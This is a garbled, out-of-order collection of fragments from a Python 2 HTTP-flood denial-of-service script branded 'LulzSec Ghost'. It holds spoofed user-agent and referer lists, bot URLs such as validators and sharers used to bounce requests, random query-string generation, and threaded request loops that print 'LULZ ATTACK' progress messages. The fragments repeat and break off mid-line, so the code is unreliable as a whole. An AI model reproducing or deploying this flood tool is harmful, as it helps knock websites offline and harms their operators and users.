"headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166", "\\ ,\\ / \\: `:\\ \\ // `:`. 
,' \\ /-._; | :", "headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile", "Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi", "keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto", "host + '/') return(headers_referers) def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\")", "headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0')", "Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)')", "headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE", "U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') 
headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A", "# generates a Keyword list def keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>')", "bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string def buildblock(size): out_str = '' for i", "url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '='", "def set_flag(val): global flag flag=val def set_safe(): global safe safe=1 # generates a", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "run(self): try: while flag<2: code=httpcall(url) if (code==800) & (safe==1): set_flag(2) except Exception, ex:", "keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica 
simpson') keyword_top.append('jacket') keyword_top.append('anderson east')", "www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)')", "STARTRD<~~[+] ' code=500 except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code)", "en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT", "headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle')", "NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) 
NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0", "headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like", "(PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1; 153x130; g4)')", "(compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE;", "headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19')", "at simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey", "(Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S", "+ buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print", "(en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0') 
headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0", "headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36')", "(http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3", "headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys robots.txt and robots", "headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys robots.txt and robots meta", "(http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 
251 (http://gsitecrawler.com/)')", "request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host)", "Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5')", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0", "headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa')", "en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android;", "libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin", "X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X", "~ ~~ ~~~ ~~~ ~~~ ~~~ \"\"\" #http request def httpcall(url): useragent_list() referer_list()", 
"6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)')", "(http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot", "Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like", "amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)')", "Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0", "(KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)", "print 'Script Priv8 Privada da LulzSec Ghost' print \"\\a\" print \\ \"\"\" .", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list def keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex')", "NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS", "Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search", "(Non-Profit Search Engine; acorn.isara.org; 
acorn at isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx", "http threads and counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if", "if sys.argv[2]==\"safe\": set_safe() url = sys.argv[1] if url.count(\"/\")==2: url = url + \"/\"", "(aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324')", "headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", ",'/ ;|/..--'' \\ Boat ,'_/.-/': : _..-'''/ / | \\ \\ _|/| \\", "Balihoo.com search engine - obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot", "Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia", "if (previous+500<request_counter) & 
(previous<>request_counter): print \"%d lULZ Up\" % (request_counter) previous=request_counter if flag==2:", "keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host + '/') return(headers_referers) def bots(): global", "headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows", "6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64)", "def run(self): previous=request_counter while flag==0: if (previous+500<request_counter) & (previous<>request_counter): print \"%d lULZ Up\"", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P", "headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X;", "\\ `--. 
) /|-._: : | \\ \\ / / :_| ;`-._; __..--';", "headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')", "MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows", "headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0", "Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE", "Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1;", "libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail", "Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus", "(previous<>request_counter): print \"%d lULZ Up\" % (request_counter) previous=request_counter if flag==2: print \"\\n -lULZ", "Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0", "headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus", "en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') 
headers_useragents.append('Mozilla/1.22 (compatible; MSIE", "(Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT", "GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;", "headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0", "headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;')", "Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)')", "3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 
(compatible;", "GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1;", "http://balihoo.com/index.aspx; robot at balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev')", "MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0", "(Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4", "(+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent')", "WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML,", "alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase", "4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android", "headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 
SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X", "print \"%d lULZ Up\" % (request_counter) previous=request_counter if flag==2: print \"\\n -lULZ Finish\"", "headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible;", "headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)')", "acorn.isara.org; acorn at isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher", "Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC", "com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon", "3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR", "Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser 
(http://www.avantbrowser.com)')", "(Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project v 1.0')", "headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0')", "Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple", "headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5", "(Attentios beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider')", "Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append('", "'[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter()", "len(sys.argv)== 3: if sys.argv[2]==\"safe\": 
set_safe() url = sys.argv[1] if url.count(\"/\")==2: url = url", "(Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5')", "flag==0: if (previous+500<request_counter) & (previous<>request_counter): print \"%d lULZ Up\" % (request_counter) previous=request_counter if", ": O ._O O_. O ._O O_. ; ; : `. // //", "| : : :: ,. . ,' :: /`-._| | | || '", "U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654')", "(Linux; U; Android 2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0", "(aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324')", "<EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)')", "import sys import threading import random import re #global params url='' host='' headers_useragents=[]", "._O O_. O ._O O_. ; ; : `. 
// // // //", "/ / / / / / ~ ~~ ~~~ ~~~ ~~~ ~~~ \"\"\"", "Boat ,'_/.-/': : _..-'''/ / | \\ \\ _|/| \\ /-./_ \\; \\", "string def buildblock(size): out_str = '' for i in range(0, size): a =", "headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML,", "list def keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si", "nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x')", "like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE", "bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\")", "set_flag(val): global flag flag=val def set_safe(): global safe safe=1 # generates a user", "Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B 